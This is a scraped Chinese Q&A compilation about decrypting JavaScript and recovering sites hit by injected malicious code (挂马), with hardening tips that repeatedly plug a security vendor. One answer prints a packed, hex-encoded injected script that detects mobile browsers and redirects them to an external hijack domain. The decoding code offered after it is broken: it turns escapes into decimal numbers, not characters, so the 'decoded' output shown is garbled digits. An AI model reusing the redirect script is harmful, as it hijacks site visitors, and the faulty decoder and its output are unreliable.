js解密网站(js在线解密)

2023-02-14 4:36:27 密语知识 思思

js在线解密 javascript解密

这个只是一个汉字的unicode编码.

告诉楼主一个简单的方法.把上面的代码放入UltraEdit中,把"\"替换为"%",然后去 解码,复制代码.解密.

最后附上我解密后的代码

var owner = "2278749";var sf_mess_cfg = {theme:"classic",color:"blue",title:"欢迎给我们留言",send:"发送",copyright:"百度提供技术支持",mbpos:"RD"};var sf_mess_msg = {emailErr: '请填写正确的Email',messErr: '您的留言字数已超过限制,请保留在1000个字以内。',prefix: '请填写',success: '我们已经收到您的留言,稍候会与您联系.谢谢!',fail: '您的留言发送失败,请重试。'};var sf_mess_cols = [{type:"textarea",mbtype: "message",tip: "留言内容",innertip: "请在此留言,我们会及时联系您",idname: "content"},{type:"text",mbtype: "tel",tip: "手机号码",innertip: "请输入您的手机号码",idname: "phone"}];document.write('script src="" type="text/javascript"/script');

js解密网站(js在线解密) 第1张

网站被挂马了,求一对JS解密

建站一段时间后总能听得到什么什么网站被挂马,什么网站被黑。好像入侵挂马似乎是件很简单的事情。其实,入侵不简单,简单的是你的网站的必要安全措施并未做好。

有条件建议找专业做网站安全的sine安全来做安全维护。

一:挂马预防措施:

1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。

2、定期对网站进行安全的检测,具体可以利用网上一些工具,如sinesafe网站挂马检测工具!

序,只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。

4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。

 

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。

8、要时常备份数据库等重要文件。

9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!

10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。

11、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程

二:挂马恢复措施:

1.修改帐号密码

不管是商业或不是,初始密码多半都是admin。因此你接到网站程序第一件事情就是“修改帐号密码”。帐号

密码就不要在使用以前你习惯的,换点特别的。尽量将字母数字及符号一起。此外密码最好超过15位。尚若你使用

SQL的话应该使用特别点的帐号密码,不要在使用什么什么admin之类,否则很容易被入侵。

2.创建一个robots.txt

Robots能够有效的防范利用搜索引擎窃取信息的骇客。

3.修改后台文件

第一步:修改后台里的验证文件的名称。

第二步:修改conn.asp,防止非法下载,也可对数据库加密后在修改conn.asp。

第三步:修改ACESS数据库名称,越复杂越好,可以的话将数据所在目录的换一下。

4.限制登陆后台IP

此方法是最有效的,每位虚拟主机用户应该都有个功能。你的IP不固定的话就麻烦点每次改一下咯,安全第一嘛。

5.自定义404页面及自定义传送ASP错误信息

404能够让骇客批量查找你的后台一些重要文件及检查网页是否存在注入漏洞。

ASP错误嘛,可能会向不明来意者传送对方想要的信息。

6.慎重选择网站程序

注意一下网站程序是否本身存在漏洞,好坏你我心里该有把秤。

7.谨慎上传漏洞

据悉,上传漏洞往往是最简单也是最严重的,能够让黑客或骇客们轻松控制你的网站。

可以禁止上传或着限制上传的文件类型。不懂的话可以找专业做网站安全的sinesafe公司。

8. cookie 保护

登陆时尽量不要去访问其他站点,以防止 cookie 泄密。切记退出时要点退出在关闭所有浏览器。

9.目录权限

请管理员设置好一些重要的目录权限,防止非正常的访问。如不要给上传目录执行脚本权限及不要给非上传目录给于写入权。

10.自我测试

如今在网上黑客工具一箩筐,不防找一些来测试下你的网站是否OK。

11.例行维护

a.定期备份数据。最好每日备份一次,下载了备份文件后应该及时删除主机上的备份文件。

b.定期更改数据库的名字及管理员帐密。

c.借WEB或FTP管理,查看所有目录体积,最后修改时间以及文件数,检查是文件是否有异常,以及查看是否有异常的账号。

网站被挂马一般都是网站程序存在漏洞或者服务器安全性能不达标被不法黑客入侵攻击而挂马的。

网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。

您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢,您否也因为不太了解网站技术的问题而耽误了网站的运营,您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。

关于ajax调用、JS 加密解密的问题!

直接用js压缩、混淆工具就可以了。

你这样子加密解密意义不大。最后总是要输出为js代码的,随便用个代码格式化工具刷一下,你的代码就被还原了。

JavaScript解密

把eval()中间的部分取出来,运行一下,即可以得到一个字符串,这个字符串即是代码:

var code = (function(p,a,c,k,e,d){e=function(c){return(ca?"":e(parseInt(c/a)))+((c=c%a)35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('B p$=["\\H\\q","\\R","\\1i\\l\\1l\\m\\o",\'\\N\\o\\h\\k\\f\\g\\l\',\'\\J\\o\\f\\n\\l\\j\',\'\\L\\A\\A\\w\\f\\1k\\f\\G\\S\\h\\l\',\'\\1g\\f\\v\\1h\\j\',\'\\S\\1y\\N\\1z\\F\',\'\\L\\g\\k\\o\\j\\h\\k\',\'\\F\\h\\g\\x\\r\',\'\\h\\J\\z\\j\\g\\f\',\'\\h\\J\\m\\k\',\'\\1s\\m\\q\\m\\o\\h\',"\\z\\l\\l\\A\\1e\\D\\D\\G\\m\\h\\k\\x\\C\\u\\j\\j\\u\\w\\f\\C\\n\\j\\u\\j\\x\\C\\n\\j\\n\\j\\C\\14\\Z\\Y\\C\\M\\M\\I\\K\\n\\K\\K\\l\\k\\I\\v\\j\\y\\D\\v\\k\\g\\D\\h\\g\\k\\f\\r\\I\\z\\l\\y\\w\\R"];B a=O["\\k\\j\\v\\x\\y\\f\\g\\l"]["\\u\\f\\l\\T\\w\\f\\y\\f\\g\\l\\1c\\17\\16\\k"](p$[0])["\\n\\o\\v"];B b=a["\\n\\A\\w\\h\\l"](p$[1])[s]+p$[2];B c={18:19(){B d=E["\\x\\n\\f\\o\\L\\u\\f\\g\\l"],e=E["\\m\\A\\A\\1d\\f\\o\\n\\h\\j\\g"];1a{1b:d["\\h\\g\\k\\f\\r\\t\\q"](p$[3])-s,W:d["\\h\\g\\k\\f\\r\\t\\q"](p$[4])-s,V:d["\\h\\g\\k\\f\\r\\t\\q"](p$[5])-s,15:d["\\h\\g\\k\\f\\r\\t\\q"](p$[6])-sd["\\h\\g\\k\\f\\r\\t\\q"](p$[7])==-s,1u:!!d["\\y\\m\\l\\v\\z"](/1v.*1t.*/),1r:!!d["\\y\\m\\l\\v\\z"](/\\(i[^;]+;( U;)? 1w.+1A 1B X/),1x:d["\\h\\g\\k\\f\\r\\t\\q"](p$[8])-s||d["\\h\\g\\k\\f\\r\\t\\q"](p$[9])-s,1q:d["\\h\\g\\k\\f\\r\\t\\q"](p$[10])-s,1j:d["\\h\\g\\k\\f\\r\\t\\q"](p$[11])-s,1f:d["\\h\\g\\k\\f\\r\\t\\q"](p$[12])==-s}}(),1o:(E["\\G\\o\\j\\H\\n\\f\\o\\F\\m\\g\\u\\x\\m\\u\\f"]||E["\\w\\m\\g\\u\\x\\m\\u\\f"])["\\l\\j\\F\\j\\H\\f\\o\\1p\\m\\n\\f"]()};1n(c["\\P\\f\\o\\n\\h\\j\\g\\n"]["\\y\\j\\G\\h\\w\\f"]==Q||c["\\P\\f\\o\\n\\h\\j\\g\\n"]["\\m\\g\\k\\o\\j\\h\\k"]==Q){}1m{O["\\w\\j\\v\\m\\l\\h\\j\\g"]["\\z\\o\\f\\q"]=p$[13]+b}',62,100,'|||||||||||||||x65|x6e|x69||x6f|x64|x74|x61|x73|x72|_|x66|x78|0x1|x4f|x67|x63|x6c|x75|x6d|x68|x70|var|x2d|x2f|navigator|x4c|x62|x77|x2e|x50|x6a|x41|x71|x54|window|x76|false|x3f|x4b|x45||webKit|presto||x30|x36|||||x33|gecko|x49|x79|versions|function|return|trident|x42|x56|x3a|webApp|x47|x6b|x26|iPad|x57|x3d|else|if|language|x43|iPhone|ios|x53|Mobile|mobile|AppleWebKit|CPU|android|x48|x4d|Mac|OS'.split('|'),0,{}))

得到的code应该是类似这样的值:

var code = "var _$=["\x77\x66","\x3f","\x26\x74\x3d\x61\x72",'\x54\x72\x69\x64\x65\x6e\x74','\x50\x72\x65\x73\x74\x6f','\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74','\x47\x65\x63\x6b\x6f','\x4b\x48\x54\x4d\x4c','\x41\x6e\x64\x72\x6f\x69\x64','\x4c\x69\x6e\x75\x78','\x69\x50\x68\x6f\x6e\x65','\x69\x50\x61\x64','\x53\x61\x66\x61\x72\x69',"\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6a\x73\x6a\x6a\x74\x64\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f"];var a=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"];var b=a["\x73\x70\x6c\x69\x74"](_$[1])[0x1]+_$[2];var c={versions:function(){var d=navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],e=navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"];return{trident:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3])-0x1,presto:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4])-0x1,webKit:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5])-0x1,gecko:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6])-0x1d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7])==-0x1,mobile:!!d["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),ios:!!d["\x6d\x61\x74\x63\x68"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),android:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8])-0x1||d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9])-0x1,iPhone:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10])-0x1,iPad:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11])-0x1,webApp:d["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12])==-0x1}}(),language:(navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"]||navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()};if(c["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"]==false||c["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"]==false){}else{window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"]=_$[13]+b}";

可以看出就是很多看不懂的东东。再把\xXX转为对应的字符:

code = code.replace(/\\x[0-9a-f]{2,2}/g, function(v){ return parseInt(v[2] + v[3], 16) })

结果可以得到如下结果:

code = "var _$=["119102","63","381166197114",'84114105100101110116','80114101115116111','65112112108101871019875105116','7110199107111','7572847776','65110100114111105100','76105110117120','10580104111110101','1058097100','839710297114105',"104116116112584747989710510011745103111111103108101451151111031111174511511111511145515448451131134610611510610611610046991111094799100110471051101001011204610411610910863"];var a=window["10011199117109101110116"]["103101116691081011091011101166612173100"](_$[0])["11511499"];var b=a["115112108105116"](_$[1])[0x1]+_$[2];var c={versions:function(){var d=navigator["11711510111465103101110116"],e=navigator["9711211286101114115105111110"];return{trident:d["10511010010112079102"](_$[3])-0x1,presto:d["10511010010112079102"](_$[4])-0x1,webKit:d["10511010010112079102"](_$[5])-0x1,gecko:d["10511010010112079102"](_$[6])-0x1d["10511010010112079102"](_$[7])==-0x1,mobile:!!d["1099711699104"](/AppleWebKit.*Mobile.*/),ios:!!d["1099711699104"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),android:d["10511010010112079102"](_$[8])-0x1||d["10511010010112079102"](_$[9])-0x1,iPhone:d["10511010010112079102"](_$[10])-0x1,iPad:d["10511010010112079102"](_$[11])-0x1,webApp:d["10511010010112079102"](_$[12])==-0x1}}(),language:(navigator["98114111119115101114769711010311797103101"]||navigator["1089711010311797103101"])["116111761111191011146797115101"]()};if(c["118101114115105111110115"]["10911198105108101"]==false||c["118101114115105111110115"]["97110100114111105100"]==false){}else{window["1081119997116105111110"]["104114101102"]=_$[13]+b}"

至于这段代码是什么意思,则自己去研究一下吧。

求各位大大帮解密段JS代码,在这里先谢谢了!

代码并没有加密,无需解密,只不过是压缩到了一行里,你自己加上一些换行和空格就能看懂了.